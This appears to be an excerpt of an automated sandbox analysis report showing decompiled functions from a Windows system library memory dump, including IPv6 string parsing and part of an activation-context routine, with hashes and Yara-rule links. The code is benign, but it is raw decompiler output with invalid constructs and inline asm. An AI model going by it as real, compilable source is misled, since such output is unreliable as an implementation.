Function 6AB87D50, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction ID: 42b88f332a5774daadcbaa7118b486b62578acb018f3302700d1acf8bb16a595
Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
Instruction Fuzzy Hash: BCB092743019808FCE46DF18C080B0533F4FB44B44B8400D0E400CBA20D629E8409A00

Uniqueness

Uniqueness Score: -1.00%

Function 6AB66CA0, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 243
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E6AB66CA0(intOrPtr* _a4, intOrPtr _a8, intOrPtr* _a12, short* _a16) {
				char _v5;
				char _v6;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _t51;
				void* _t52;
				signed int _t54;
				signed short _t58;
				signed short _t59;
				void* _t60;
				signed short _t61;
				signed short _t62;
				signed short _t63;
				signed short _t69;
				signed short _t73;
				signed short _t74;
				signed short _t75;
				signed int _t82;
				intOrPtr _t83;
				signed short _t84;
				signed short _t86;
				signed short _t87;
				signed int _t88;
				void* _t92;
				signed int _t97;
				short _t98;
				signed short _t99;
				signed short _t101;
				signed short _t102;
				char _t103;
				void* _t107;
				void* _t108;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;
				signed int _t118;
				intOrPtr* _t122;
				void* _t123;
				void* _t125;
				signed int _t127;
				signed int _t129;
				signed int _t130;
				signed short _t134;
				signed int _t136;
				intOrPtr* _t139;
				void* _t146;

				_t51 = _a4;
				if(_t51 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L6:
					_t52 = 0xc000000d;
				} else {
					_t103 =  *_t51;
					_t97 = 0;
					_v12 = 0;
					_v20 = 0;
					_v5 = _t103;
					_t146 = _t103 - 0x5b;
					if(_t146 == 0) {
						_t51 = _t51 + 1;
						__eflags = _t103 - 0x5b;
					}
					_v6 = _t146 == 0;
					if(E6AB66D10(_t51,  &_v16, _a8) >= 0) {
						_t139 = _v16;
						_t54 = 0xa;
						__eflags =  *_t139 - 0x25;
						if( *_t139 != 0x25) {
							L22:
							__eflags =  *_t139 - 0x5d;
							if( *_t139 != 0x5d) {
								L51:
								_t98 = _v12;
								goto L52;
							} else {
								__eflags = _v5 - 0x5b;
								if(_v5 != 0x5b) {
									goto L6;
								} else {
									_t139 = _t139 + 1;
									_v6 = _t97;
									__eflags =  *_t139 - 0x3a;
									if( *_t139 != 0x3a) {
										goto L51;
									} else {
										_t139 = _t139 + 1;
										_v16 = _t54;
										_t129 = 0x10;
										__eflags =  *_t139 - 0x30;
										if( *_t139 == 0x30) {
											_t28 = _t139 + 1; // 0x4
											_t122 = _t28;
											_v16 = 8;
											_t139 = _t122;
											_t83 =  *_t139;
											__eflags = _t83 - 0x78;
											if(_t83 == 0x78) {
												L28:
												_v16 = _t129;
												_t31 = _t122 + 1; // 0x4
												_t139 = _t31;
											} else {
												__eflags = _t83 - 0x58;
												if(_t83 == 0x58) {
													goto L28;
												}
											}
										}
										_t58 =  *_t139;
										_v5 = _t58;
										__eflags = _t58;
										if(_t58 == 0) {
											goto L51;
										} else {
											_t99 = _v12;
											do {
												_t134 = _t58;
												_t59 = E6ABACB30(_t58, _t134);
												_pop(_t107);
												__eflags = _t59;
												if(_t59 == 0) {
													L36:
													_t60 = 0x10;
													__eflags = _v16 - _t60;
													if(_v16 != _t60) {
														goto L6;
													} else {
														_t61 = E6ABACB30(_t60, _t134);
														_pop(_t108);
														__eflags = _t61;
														if(_t61 == 0) {
															goto L6;
														} else {
															_t62 = E6ABACDD0(_t108, _t134);
															__eflags = _t62;
															if(_t62 == 0) {
																goto L6;
															} else {
																_t63 = E6ABACB30(_t62, _t134);
																_pop(_t110);
																__eflags = _t63;
																if(_t63 == 0) {
																	L42:
																	_push(0x41);
																} else {
																	_t74 = E6ABACCE0(_t110, _t134);
																	__eflags = _t74;
																	if(_t74 == 0) {
																		goto L42;
																	} else {
																		_push(0x61);
																	}
																}
																_pop(_t111);
																_t68 = ((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134;
																__eflags = ((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134 - 0xffff;
																if(((_t99 & 0x0000ffff) << 4) - _t111 + 0xa + _t134 > 0xffff) {
																	goto L6;
																} else {
																	_v12 = _v12 << 4;
																	_t69 = E6ABACB30(_t68, _t134);
																	_pop(_t112);
																	__eflags = _t69;
																	if(_t69 == 0) {
																		L47:
																		_push(0x41);
																	} else {
																		_t73 = E6ABACCE0(_t112, _t134);
																		__eflags = _t73;
																		if(_t73 == 0) {
																			goto L47;
																		} else {
																			_push(0x61);
																		}
																	}
																	_pop(_t113);
																	asm("cbw");
																	_t114 = 0xa;
																	_t99 = _v12 + _v5 - _t113 + _t114;
																	__eflags = _t99;
																	_v12 = _t99;
																	goto L49;
																}
															}
														}
													}
												} else {
													_t75 = E6ABACC80(_t107, _t134);
													__eflags = _t75;
													if(_t75 == 0) {
														goto L36;
													} else {
														_t118 = _v16;
														_t130 = _t118 & 0x0000ffff;
														__eflags = _t134 - 0x30 - _t130;
														if(_t134 - 0x30 >= _t130) {
															goto L36;
														} else {
															__eflags = (_t99 & 0x0000ffff) * _t130 + 0xffffffd0 + _t134 - 0xffff;
															if((_t99 & 0x0000ffff) * _t130 + 0xffffffd0 + _t134 > 0xffff) {
																goto L6;
															} else {
																asm("cbw");
																_t82 = _t118 * _v12 - 0x00000030 + _v5 & 0x0000ffff;
																_v12 = _t82;
																_t99 = _t82;
																goto L49;
															}
														}
													}
												}
												goto L7;
												L49:
												_t139 = _t139 + 1;
												_t58 =  *_t139;
												_v5 = _t58;
												__eflags = _t58;
											} while (_t58 != 0);
											L52:
											__eflags =  *_t139;
											if( *_t139 != 0) {
												goto L6;
											} else {
												__eflags = _v6;
												if(_v6 != 0) {
													goto L6;
												} else {
													 *_a16 = _t98;
													 *_a12 = _v20;
													_t52 = 0;
												}
											}
										}
									}
								}
							}
						} else {
							_t139 = _t139 + 1;
							_t101 =  *_t139;
							_t135 = _t101;
							_t84 = E6ABACB30(_t54, _t101);
							_pop(_t123);
							__eflags = _t84;
							if(_t84 == 0) {
								goto L6;
							} else {
								_t85 = E6ABACC80(_t123, _t135);
								__eflags = _t85;
								if(_t85 == 0) {
									goto L6;
								} else {
									__eflags = _t101;
									if(_t101 == 0) {
										L21:
										_t97 = _v12;
										_t54 = 0xa;
										goto L22;
									} else {
										_t136 = _v12;
										while(1) {
											__eflags = _t101 - 0x5d;
											if(_t101 == 0x5d) {
												goto L21;
											}
											_t102 = _t101;
											_t86 = E6ABACB30(_t85, _t102);
											_pop(_t125);
											__eflags = _t86;
											if(_t86 == 0) {
												goto L6;
											} else {
												_t87 = E6ABACC80(_t125, _t102);
												__eflags = _t87;
												if(_t87 == 0) {
													goto L6;
												} else {
													_t88 = _v20;
													_t127 = 0xa;
													_v16 = _t88 * _t127;
													asm("cdq");
													_v16 = _v16 + _t102;
													asm("adc ecx, edx");
													_t92 = _v16 + 0xffffffd0;
													asm("adc ecx, 0xffffffff");
													__eflags = _t88 * _t127 >> 0x20 - _t136;
													if(__eflags > 0) {
														goto L6;
													} else {
														if(__eflags < 0) {
															L20:
															_t85 = 0xffffffd0 + _v20 * 0xa + _t102;
															_t139 = _t139 + 1;
															_v20 = 0xffffffd0 + _v20 * 0xa + _t102;
															_t101 =  *_t139;
															__eflags = _t101;
															if(_t101 != 0) {
																continue;
															} else {
																goto L21;
															}
														} else {
															__eflags = _t92 - 0xffffffff;
															if(_t92 > 0xffffffff) {
																goto L6;
															} else {
																goto L20;
															}
														}
													}
												}
											}
											goto L7;
										}
										goto L21;
									}
								}
							}
						}
					} else {
						goto L6;
					}
				}
				L7:
				return _t52;
			}

0x6ab66ca5
0x6ab66cb0
0x6ab66cef
0x6ab66cef
0x6ab66cc4
0x6ab66cc4
0x6ab66cc6
0x6ab66cc8
0x6ab66ccb
0x6ab66cce
0x6ab66cd1
0x6ab66cd4
0x6ab66cfd
0x6ab66cfe
0x6ab66cfe
0x6ab66cdc
0x6ab66ce9
0x6abc1c19
0x6abc1c1e
0x6abc1c1f
0x6abc1c22
0x6abc1cc3
0x6abc1cc3
0x6abc1cc6
0x6abc1e20
0x6abc1e20
0x00000000
0x6abc1ccc
0x6abc1ccc
0x6abc1cd0
0x00000000
0x6abc1cd6
0x6abc1cd6
0x6abc1cd7
0x6abc1cda
0x6abc1cdd
0x00000000
0x6abc1ce3
0x6abc1ce3
0x6abc1ce4
0x6abc1ce9
0x6abc1cea
0x6abc1ced
0x6abc1cef
0x6abc1cef
0x6abc1cf2
0x6abc1cf9
0x6abc1cfb
0x6abc1cfd
0x6abc1cff
0x6abc1d05
0x6abc1d05
0x6abc1d08
0x6abc1d08
0x6abc1d01
0x6abc1d01
0x6abc1d03
0x00000000
0x00000000
0x6abc1d03
0x6abc1cff
0x6abc1d0b
0x6abc1d0d
0x6abc1d10
0x6abc1d12
0x00000000
0x6abc1d18
0x6abc1d18
0x6abc1d1c
0x6abc1d1c
0x6abc1d20
0x6abc1d25
0x6abc1d26
0x6abc1d28
0x6abc1d76
0x6abc1d78
0x6abc1d79
0x6abc1d7d
0x00000000
0x6abc1d83
0x6abc1d84
0x6abc1d89
0x6abc1d8a
0x6abc1d8c
0x00000000
0x6abc1d92
0x6abc1d93
0x6abc1d99
0x6abc1d9b
0x00000000
0x6abc1da1
0x6abc1da2
0x6abc1da7
0x6abc1da8
0x6abc1daa
0x6abc1dbb
0x6abc1dbb
0x6abc1dac
0x6abc1dad
0x6abc1db3
0x6abc1db5
0x00000000
0x6abc1db7
0x6abc1db7
0x6abc1db7
0x6abc1db5
0x6abc1dc3
0x6abc1dc9
0x6abc1dcb
0x6abc1dd0
0x00000000
0x6abc1dd6
0x6abc1dd6
0x6abc1ddb
0x6abc1de0
0x6abc1de1
0x6abc1de3
0x6abc1df4
0x6abc1df4
0x6abc1de5
0x6abc1de6
0x6abc1dec
0x6abc1dee
0x00000000
0x6abc1df0
0x6abc1df0
0x6abc1df0
0x6abc1dee
0x6abc1dfd
0x6abc1dfe
0x6abc1e05
0x6abc1e09
0x6abc1e09
0x6abc1e0c
0x00000000
0x6abc1e0c
0x6abc1dd0
0x6abc1d9b
0x6abc1d8c
0x6abc1d2a
0x6abc1d2b
0x6abc1d31
0x6abc1d33
0x00000000
0x6abc1d35
0x6abc1d35
0x6abc1d3b
0x6abc1d3e
0x6abc1d40
0x00000000
0x6abc1d42
0x6abc1d4d
0x6abc1d52
0x00000000
0x6abc1d58
0x6abc1d5f
0x6abc1d68
0x6abc1d6b
0x6abc1d6e
0x00000000
0x6abc1d6e
0x6abc1d52
0x6abc1d40
0x6abc1d33
0x00000000
0x6abc1e10
0x6abc1e10
0x6abc1e11
0x6abc1e13
0x6abc1e16
0x6abc1e16
0x6abc1e24
0x6abc1e24
0x6abc1e27
0x00000000
0x6abc1e2d
0x6abc1e2d
0x6abc1e31
0x00000000
0x6abc1e37
0x6abc1e3e
0x6abc1e47
0x6abc1e49
0x6abc1e49
0x6abc1e31
0x6abc1e27
0x6abc1d12
0x6abc1cdd
0x6abc1cd0
0x6abc1c28
0x6abc1c28
0x6abc1c29
0x6abc1c2b
0x6abc1c2f
0x6abc1c34
0x6abc1c35
0x6abc1c37
0x00000000
0x6abc1c3d
0x6abc1c3e
0x6abc1c44
0x6abc1c46
0x00000000
0x6abc1c4c
0x6abc1c4c
0x6abc1c4e
0x6abc1cbd
0x6abc1cbd
0x6abc1cc2
0x00000000
0x6abc1c50
0x6abc1c50
0x6abc1c53
0x6abc1c53
0x6abc1c56
0x00000000
0x00000000
0x6abc1c58
0x6abc1c5c
0x6abc1c61
0x6abc1c62
0x6abc1c64
0x00000000
0x6abc1c6a
0x6abc1c6b
0x6abc1c71
0x6abc1c73
0x00000000
0x6abc1c79
0x6abc1c79
0x6abc1c7e
0x6abc1c81
0x6abc1c88
0x6abc1c89
0x6abc1c8f
0x6abc1c91
0x6abc1c94
0x6abc1c97
0x6abc1c99
0x00000000
0x6abc1c9f
0x6abc1c9f
0x6abc1caa
0x6abc1cb1
0x6abc1cb3
0x6abc1cb4
0x6abc1cb7
0x6abc1cb9
0x6abc1cbb
0x00000000
0x00000000
0x00000000
0x00000000
0x6abc1ca1
0x6abc1ca1
0x6abc1ca4
0x00000000
0x00000000
0x00000000
0x00000000
0x6abc1ca4
0x6abc1c9f
0x6abc1c99
0x6abc1c73
0x00000000
0x6abc1c64
0x00000000
0x6abc1c53
0x6abc1c4e
0x6abc1c46
0x6abc1c37
0x00000000
0x00000000
0x00000000
0x6ab66ce9
0x6ab66cf4
0x6ab66cfa

APIs

RtlIpv6StringToAddressA.1105(?,00000000,?,00000000), ref: 6AB66CE2

Strings

[, xrefs: 6ABC1CCC

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressIpv6String
String ID: [
API String ID: 27538981-784033777
Opcode ID: 6fc8d88a6431a7faa658da00268c126386f55933642b9b9e14cb1f00605dfa96
Instruction ID: 83dbc6b1c91dc7f4518f9bedeed681375703dfec034adee93cff19cbf9106a5f
Opcode Fuzzy Hash: 6fc8d88a6431a7faa658da00268c126386f55933642b9b9e14cb1f00605dfa96
Instruction Fuzzy Hash: 227105319046C66EEB048E78E870BEE77B4EF46324F19415AE4A1EB2C1EF34C191E721

Uniqueness

Uniqueness Score: -1.00%

Function 6AB66D10, Relevance: 21.3, APIs: 14, Instructions: 316
stringCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E6AB66D10(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char** _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _t97;
				char** _t99;
				void* _t108;
				long _t115;
				void* _t118;
				char* _t120;
				char** _t121;
				long _t122;
				long _t123;
				signed int _t124;
				void* _t127;
				void* _t132;
				char* _t134;
				char** _t137;
				intOrPtr _t141;
				intOrPtr _t142;
				signed int _t143;
				char _t146;
				signed int _t151;
				char* _t153;
				intOrPtr* _t155;
				void* _t156;
				void* _t157;
				void* _t161;
				void* _t162;
				char** _t170;
				intOrPtr _t172;
				intOrPtr _t173;
				intOrPtr _t175;
				intOrPtr _t177;
				signed int _t179;
				signed int _t180;
				void* _t182;
				void* _t189;

				_t97 = 0;
				_v32 = 0;
				_t170 = 0;
				_v5 = 0;
				_t180 = 0;
				_v28 = 0;
				_t143 = 0;
				_v24 = 0;
				_t179 = 0;
				_v20 = 0;
				_v12 = 0;
				_v16 = 0;
				_t141 =  *_a4;
				while(_t141 != 0) {
					_t117 = _t97;
					if(_t117 != 0) {
						_t118 = _t117 - 1;
						if(_t118 != 0) {
							_t117 = _t118 == 1;
							if(_t118 == 1) {
								goto L3;
							}
							_t121 = _v20;
							_t177 = _v24;
							L27:
							if(_t177 != 1) {
								L32:
								_t142 = _a12;
								L52:
								_t153 = _v32;
								_t180 = _v12;
								if(_t153 == 0) {
									goto L28;
								}
								if(_t121 != 0) {
									if(_t180 > 3) {
										L14:
										return 0xc000000d;
									}
									_t122 = strtol(_t153, 0, 0xa);
									_t189 = _t189 + 0xc;
									if(_t122 > 0xff) {
										goto L14;
									}
									_t170 = _v20;
									 *(_t170 + _v28 * 2 + _t142 - 1) = _t122;
									L29:
									_t97 = _v24;
									L30:
									_t155 = _a4 + 1;
									_a4 = _t155;
									_t141 =  *_t155;
									_t143 = _v16;
									continue;
								}
								if(_t180 > 4) {
									goto L14;
								}
								_t123 = strtol(_t153, _t121, 0x10);
								_t189 = _t189 + 0xc;
								_t124 = _v28;
								 *((short*)(_t142 + _t124 * 2)) = _t123;
								_v28 = _t124 + 1;
							}
							L28:
							_t170 = _v20;
							goto L29;
						}
						_t185 = _t141;
						_t131 = E6ABACB30(_t118, _t141);
						_pop(_t161);
						if(_t131 == 0 || E6ABACC80(_t161, _t185) == 0) {
							_t132 = E6ABACB30(_t131, _t185);
							_pop(_t162);
							if(_t132 == 0 || E6ABACDD0(_t162, _t185) == 0) {
								if(_t141 == 0x3a) {
									if(_v20 != 0 || _t179 > 6) {
										L9:
										_t143 = _v16;
										goto L10;
									} else {
										_t134 = _a4 + 1;
										if( *_t134 != 0x3a) {
											_t177 = 0;
											L43:
											_t180 = _v12;
											_t179 = _t179 + 1;
											_t121 = _v20;
											L26:
											_v24 = _t177;
											goto L27;
										}
										_t143 = _v16;
										if(_t143 != 0) {
											L10:
											_t180 = _v12;
											break;
										}
										_t177 = 2;
										_t37 = _t179 + 1; // 0x1
										_a4 = _t134;
										_push(_t177);
										_v16 = _t37;
										_pop(1);
										goto L43;
									}
								}
								if(_t141 != 0x2e) {
									goto L9;
								}
								if(_v5 != 0) {
									goto L9;
								}
								_t137 = _v20;
								if(_t137 > 2 || _t179 > 6) {
									goto L9;
								} else {
									_t121 = _t137 + 1;
									_v20 = _t121;
									_v24 = 0;
									goto L32;
								}
							} else {
								_t170 = _v20;
								_t180 = _v12 + 1;
								_v12 = _t180;
								if(_t170 != 0) {
									_t143 = _v16;
									break;
								}
								_v5 = 1;
								goto L29;
							}
						} else {
							_t180 = _v12 + 1;
							_v12 = _t180;
							goto L28;
						}
					}
					L3:
					if(_t141 == 0x3a) {
						if(_t170 != 0 || _t179 != 0) {
							break;
						} else {
							_t120 = _a4 + 1;
							if( *_t120 != 0x3a) {
								break;
							}
							_t142 = _a12;
							_a4 = _t120;
							_t121 = _v20;
							_v16 = 1;
							_t151 = _v28;
							_t179 = 2;
							 *((short*)(_t142 + _t151 * 2)) = _t170;
							_t175 = _t179;
							_v28 = _t151 + 1;
							_v24 = _t175;
							goto L52;
						}
					}
					if(_t179 > 7) {
						break;
					}
					_t183 = _t141;
					_t126 = E6ABACB30(_t117, _t141);
					_pop(_t156);
					if(_t126 == 0 || E6ABACC80(_t156, _t183) == 0) {
						_t127 = E6ABACB30(_t126, _t183);
						_pop(_t157);
						if(_t127 == 0 || E6ABACDD0(_t157, _t183) == 0) {
							goto L9;
						} else {
							_t121 = _v20;
							if(_t121 != 0) {
								goto L9;
							}
							_v5 = 1;
							_t177 = 1;
							_v32 = _a4;
							_t180 = 1;
							_v12 = 1;
							goto L26;
						}
					} else {
						_t170 = _v20;
						_v32 = _a4;
						_t97 = 1;
						_v5 = 0;
						_t180 = 1;
						_v24 = 1;
						_v12 = 1;
						goto L30;
					}
				}
				 *_a8 = _a4;
				_t99 = _v20;
				if(_t99 != 0) {
					if(_t99 != 3) {
						goto L14;
					}
					_t179 = _t179 + 1;
				}
				if(_t143 != 0 || _t179 == 7) {
					_t172 = _v24;
					if(_t172 != 1) {
						if(_t172 != 2) {
							goto L14;
						}
						_t173 = _a12;
						 *((short*)(_t173 + _v28 * 2)) = 0;
						L73:
						if(_t143 != 0) {
							_t182 = _t173 + _t143 * 2;
							memmove(_t173 + (_t143 - _t179 + 8) * 2, _t182, _t179 - _t143 + _t179 - _t143);
							_t108 = 8;
							memset(_t182, 0, _t108 - _t179 + _t108 - _t179);
						}
						return 0;
					}
					if(_t99 != 0) {
						if(_t180 > 3) {
							goto L14;
						}
						_t146 = strtol(_v32, 0, 0xa);
						_t189 = _t189 + 0xc;
						if(_t146 > 0xff) {
							goto L14;
						}
						_t173 = _a12;
						 *((char*)(_v20 + _v28 * 2 + _t173)) = _t146;
						L70:
						_t143 = _v16;
						goto L73;
					}
					if(_t180 > 4) {
						goto L14;
					}
					_t115 = strtol(_v32, _t99, 0x10);
					_t173 = _a12;
					_t189 = _t189 + 0xc;
					 *((short*)(_t173 + _v28 * 2)) = _t115;
					goto L70;
				} else {
					goto L14;
				}
			}

0x6ab66d1c
0x6ab66d1e
0x6ab66d21
0x6ab66d23
0x6ab66d26
0x6ab66d28
0x6ab66d2b
0x6ab66d2d
0x6ab66d31
0x6ab66d33
0x6ab66d39
0x6ab66d3c
0x6ab66d3f
0x6ab66d41
0x6ab66d45
0x6ab66d48
0x6ab66dc7
0x6ab66dca
0x6abc1e50
0x6abc1e53
0x00000000
0x00000000
0x6abc1e59
0x6abc1e5c
0x6ab66e3b
0x6ab66e3e
0x6ab66e60
0x6ab66e60
0x6abc1f34
0x6abc1f34
0x6abc1f37
0x6abc1f3c
0x00000000
0x00000000
0x6abc1f44
0x6abc1f90
0x6ab66db9
0x00000000
0x6ab66db9
0x6abc1f9b
0x6abc1fa0
0x6abc1fa8
0x00000000
0x00000000
0x6abc1fae
0x6abc1fb7
0x6ab66e43
0x6ab66e43
0x6ab66e46
0x6ab66e49
0x6ab66e4a
0x6ab66e4d
0x6ab66e4f
0x00000000
0x6ab66e4f
0x6abc1f49
0x00000000
0x00000000
0x6abc1f53
0x6abc1f5a
0x6abc1f5f
0x6abc1f62
0x6abc1f67
0x6abc1f67
0x6ab66e40
0x6ab66e40
0x00000000
0x6ab66e40
0x6ab66dd0
0x6ab66dd4
0x6ab66dd9
0x6ab66ddc
0x6ab66dea
0x6ab66def
0x6ab66df2
0x6ab66e06
0x6abc1e83
0x6ab66d8f
0x6ab66d8f
0x00000000
0x6abc1e92
0x6abc1e95
0x6abc1e99
0x6abc1eb8
0x6abc1ebb
0x6abc1ebb
0x6abc1ebe
0x6abc1ec0
0x6ab66e38
0x6ab66e38
0x00000000
0x6ab66e38
0x6abc1e9b
0x6abc1ea0
0x6ab66d92
0x6ab66d92
0x00000000
0x6ab66d92
0x6abc1ea8
0x6abc1ea9
0x6abc1eac
0x6abc1eaf
0x6abc1eb0
0x6abc1eb3
0x00000000
0x6abc1eb3
0x6abc1e83
0x6ab66e0f
0x00000000
0x00000000
0x6abc1ecc
0x00000000
0x00000000
0x6abc1ed2
0x6abc1ed8
0x00000000
0x6abc1ee7
0x6abc1ee7
0x6abc1eea
0x6abc1eed
0x00000000
0x6abc1eed
0x6abc1e64
0x6abc1e67
0x6abc1e6a
0x6abc1e6b
0x6abc1e70
0x6abc1fc0
0x00000000
0x6abc1fc0
0x6abc1e76
0x00000000
0x6abc1e76
0x6ab66e57
0x6ab66e5a
0x6ab66e5b
0x00000000
0x6ab66e5b
0x6ab66ddc
0x6ab66d4a
0x6ab66d4d
0x6abc1ef7
0x00000000
0x6abc1f05
0x6abc1f08
0x6abc1f0c
0x00000000
0x00000000
0x6abc1f12
0x6abc1f18
0x6abc1f1b
0x6abc1f1e
0x6abc1f21
0x6abc1f26
0x6abc1f28
0x6abc1f2d
0x6abc1f2e
0x6abc1f31
0x00000000
0x6abc1f31
0x6abc1ef7
0x6ab66d56
0x00000000
0x00000000
0x6ab66d58
0x6ab66d5c
0x6ab66d61
0x6ab66d64
0x6ab66d76
0x6ab66d7b
0x6ab66d7e
0x00000000
0x6ab66e1a
0x6ab66e1a
0x6ab66e1f
0x00000000
0x00000000
0x6ab66e2c
0x6ab66e30
0x6ab66e31
0x6ab66e34
0x6ab66e35
0x00000000
0x6ab66e35
0x6abc1f6f
0x6abc1f74
0x6abc1f77
0x6abc1f7c
0x6abc1f7d
0x6abc1f81
0x6abc1f82
0x6abc1f85
0x00000000
0x6abc1f85
0x6ab66d64
0x6ab66d9b
0x6ab66d9d
0x6ab66da2
0x6abc1fcb
0x00000000
0x00000000
0x6abc1fd1
0x6abc1fd1
0x6ab66daa
0x6abc1fd7
0x6abc1fdd
0x6abc2047
0x00000000
0x00000000
0x6abc204d
0x6abc2055
0x6abc2059
0x6abc205b
0x6abc205d
0x6abc2071
0x6abc2078
0x6abc2081
0x6abc2086
0x00000000
0x6abc2089
0x6abc1fe1
0x6abc200d
0x00000000
0x00000000
0x6abc201f
0x6abc2021
0x6abc202a
0x00000000
0x00000000
0x6abc2039
0x6abc203c
0x6abc203f
0x6abc203f
0x00000000
0x6abc203f
0x6abc1fe6
0x00000000
0x00000000
0x6abc1ff2
0x6abc1ff7
0x6abc1ffe
0x6abc2004
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__isascii.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6AB66D5C
isdigit.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6AB66D67
__isascii.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6AB66D76
isxdigit.1105(?,?,?,00000000,?,00000000,?,00000000), ref: 6AB66D81
__isascii.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6AB66DD4
isdigit.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6AB66DDF
__isascii.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6AB66DEA
isxdigit.1105(00000000,?,?,00000000,?,00000000,?,00000000), ref: 6AB66DF5
strtol.1105(?,00000000,00000010,?,?,00000000,?,00000000,?,00000000), ref: 6ABC1F53

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: __isascii$isdigitisxdigit$strtol
String ID:
API String ID: 2731936382-0
Opcode ID: ce4017a68cac62f16c561abc348bc20d924df1deea31378d96b57986fe07fbb5
Instruction ID: 5fc28a48191baeb91c9d8e9b63e6a3fcad2c902425d71e6c2dd195107ae7d644
Opcode Fuzzy Hash: ce4017a68cac62f16c561abc348bc20d924df1deea31378d96b57986fe07fbb5
Instruction Fuzzy Hash: E4B11871E0429AABDB18CF68C860BEFB7B5EF46300F159069E941EB341EF3099519BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6AB64360, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6AB64360(signed int _a4, unsigned int _a8) {
				void* _v4;
				signed int _v8;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				signed int _v84;
				signed int _v88;
				char _v92;
				signed int _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t43;
				signed char _t46;
				signed int _t67;
				signed int _t69;
				void* _t70;
				signed int _t79;
				signed int _t82;
				signed int _t83;
				void* _t84;
				signed int _t85;
				void* _t86;
				signed int _t87;
				signed int _t89;

				_t89 = (_t87 & 0xfffffff8) - 0x5c;
				_t40 =  *0x6ac5d360 ^ _t89;
				_v8 =  *0x6ac5d360 ^ _t89;
				_push(_t85);
				if((_a4 & 0xfffffffe) != 0) {
					_push(_a4);
					_push("RtlDeactivateActivationContext");
					_push("SXS: %s() called with invalid flags 0x%08lx\n");
					L17:
					_push(0);
					_push(0x33);
					E6ABF5720();
					_t89 = _t89 + 0x14;
					L19:
					_push(0xc000000d);
					L21:
					L6ABBDF30(_t71, _t80);
					L22:
					_t82 =  *_t85;
					_t71 = 0;
					if(_t82 == 0) {
						_t43 = 0;
					} else {
						asm("sbb eax, eax");
						_t43 =  ~( *(_t82 + 8) & 8) & _t82;
					}
					if(_t82 == 0) {
						L20:
						_push(0xc0150010);
						goto L21;
					} else {
						while(_t43 == 0 ||  *((intOrPtr*)(_t43 + 0xc)) != _t80) {
							_t82 =  *_t82;
							_t71 = _t71 + 1;
							if(_t82 == 0) {
								_t43 = 0;
							} else {
								asm("sbb eax, eax");
								_t43 =  ~( *(_t82 + 8) & 8) & _t82;
							}
							if(_t82 != 0) {
								continue;
							}
							break;
						}
						if(_t82 == 0) {
							goto L20;
						}
						_v84 = _v84 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_push( &_v92);
						_v76 = 3;
						_v72 = _t71;
						_v68 = _t82;
						_v64 = _t85;
						_v92 = 0xc015000f;
						E6ABBDEF0(_t71, _t80);
						L8:
						_t83 =  *_t82;
						do {
							_t46 =  *(_t85 + 8);
							_t69 =  *_t85;
							if((_t46 & 0x00000001) != 0) {
								E6AB99B10( *((intOrPtr*)(_t85 + 4)));
								_t46 =  *(_t85 + 8);
							}
							if((_t46 & 0x00000008) != 0) {
								_t80 = _t85;
								E6AB64439(_v88, _t85);
							}
							_t85 = _t69;
						} while (_t69 != _t83);
						_t40 = _v88;
						 *_v88 = _t83;
						L14:
						_pop(_t84);
						_pop(_t86);
						_pop(_t70);
						return E6ABAB640(_t40, _t70,  *(_t89 + 0x64) ^ _t89, _t80, _t84, _t86);
					}
				}
				_t80 = _a8;
				if(_t80 == 0) {
					goto L14;
				}
				if((_t80 & 0xf0000000) != 0x10000000) {
					_push(_t80);
					_push("RtlDeactivateActivationContext");
					_push("SXS: %s() called with invalid cookie type 0x%08Ix\n");
					goto L17;
				}
				_t85 = 0xfff;
